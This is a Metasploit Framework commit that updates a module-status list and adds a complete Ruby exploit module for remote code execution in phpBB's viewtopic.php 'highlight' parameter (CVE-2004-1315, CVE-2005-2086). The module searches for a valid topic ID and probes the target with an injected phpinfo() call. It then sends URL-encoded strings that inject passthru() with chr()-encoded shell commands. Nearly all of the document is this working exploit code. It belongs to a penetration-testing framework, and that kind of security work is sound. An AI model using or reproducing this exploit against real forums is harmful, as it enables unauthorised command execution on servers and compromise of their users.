phpBB2_highlight module port
git-svn-id: file:///home/svn/framework3/trunk@5432 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
c546d6ec9c
commit
1f7eb2147f
|
@ -9,7 +9,6 @@ Unfinished modules
|
|||
hpux_ftpd_preauth_list
|
||||
iis_source_dumper
|
||||
lyris_attachment_mssql
|
||||
phpbb_highlight
|
||||
phpnuke_search_module
|
||||
realvnc_41_bypass
|
||||
samba_trans2open
|
||||
|
@ -17,7 +16,6 @@ Unfinished modules
|
|||
smb_sniffer
|
||||
solaris_kcms_readfile
|
||||
solaris_snmpxdmid
|
||||
sphpblog_file_upload
|
||||
sybase_easerver
|
||||
sygate_policy_manager
|
||||
uow_imap4_copy
|
||||
|
@ -120,6 +118,7 @@ Completed modules
|
|||
php_wordpress_lastpost exploit/unix/webapp/php_wordpress_lastpost
|
||||
php_vbulletin_template exploit/unix/webapp/php_vbulletin_template
|
||||
php_xmlrpc_eval exploit/unix/webapp/php_xmlrpc_eval
|
||||
phpbb_highlight exploit/unix/webapp/phpbb_highlight
|
||||
poptop_negative_read exploit/linux/pptp/poptop_negative_read
|
||||
privatewire_gateway_win32 exploit/windows/http/privatewire_gateway
|
||||
putty_ssh exploit/windows/ssh/putty_msg_debug
|
||||
|
@ -144,6 +143,7 @@ Completed modules
|
|||
solaris_lpd_unlink auxiliary/dos/solaris/lpd/cascade_delete
|
||||
solaris_sadmind_exec exploit/solaris/sunrpc/solaris_sadmind_exec
|
||||
solaris_ttyprompt exploit/solaris/telnet/ttyprompt
|
||||
sphpblog_file_upload exploit/unix/webapp/sphpblog_file_upload
|
||||
squid_ntlm_authenticate exploit/linux/proxy/squid_ntlm_authenticate
|
||||
svnserve_date exploit/multi/svn/svnserve_date
|
||||
tftpd32_long_filename exploit/windows/tftp/tftpd32_long_filename
|
||||
|
|
|
@ -0,0 +1,131 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Unix::Webapp::PHPBB_Highlight < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'phpBB viewtopic.php Arbitrary Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits two arbitrary PHP code execution flaws in the
|
||||
phpBB forum system. The problem is that the 'highlight' parameter
|
||||
in the 'viewtopic.php' script is not verified properly and will
|
||||
allow an attacker to inject arbitrary code via preg_replace().
|
||||
},
|
||||
'Author' => [ 'valsmith[at]metasploit.com', 'hdm', 'patrick' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '11719'],
|
||||
[ 'OSVDB', '17613'],
|
||||
[ 'CVE', '2005-2086'],
|
||||
[ 'CVE', '2004-1315'],
|
||||
[ 'BID', '14086'],
|
||||
[ 'BID', '10701'],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true,
|
||||
'Space' => 1024,
|
||||
},
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { }],
|
||||
[ 'phpbb <=2.0.10', { }],
|
||||
[ 'phpbb <=2.0.15', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 12 2004',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, "The phpBB root Directory", "/phpBB2"]),
|
||||
OptString.new('TOPIC', [false, "The ID of a valid topic"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def find_topic
|
||||
|
||||
1.upto(32) do |x|
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + '/viewtopic.php?topic=' + x.to_s,
|
||||
}, 25)
|
||||
|
||||
if (res and res.body.match(/class="postdetails"/))
|
||||
print_status("Discovered valid topic ID: #{x}")
|
||||
return x
|
||||
end
|
||||
|
||||
end
|
||||
return false
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
topic = datastore['TOPIC'] || find_topic
|
||||
|
||||
if !(topic)
|
||||
print_status("No valid topic ID found, please specify the TOPIC option.")
|
||||
return
|
||||
else
|
||||
|
||||
sploit = datastore['URI'] + "/viewtopic.php?t=#{topic}&highlight="
|
||||
|
||||
case target.name
|
||||
when /Automatic/
|
||||
req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527"
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + req
|
||||
}, 25)
|
||||
|
||||
print_status("Trying to determine which attack method to use...")
|
||||
|
||||
if (res and res.body =~ /\<title>phpinfo/)
|
||||
byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
|
||||
sploit << "%2527%252epassthru(#{byte})%252e%2527"
|
||||
else
|
||||
byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
|
||||
sploit << "%27.passthru(#{byte}).%27"
|
||||
end
|
||||
|
||||
when /2\.0\.10/
|
||||
byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('%252e')
|
||||
sploit << "%2527%252epassthru(#{byte})%252e%2527"
|
||||
when /2\.0\.15/
|
||||
byte = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
|
||||
sploit << "%27.passthru(#{byte}).%27"
|
||||
end
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => sploit
|
||||
}, 25)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
Loading…
Reference in New Issue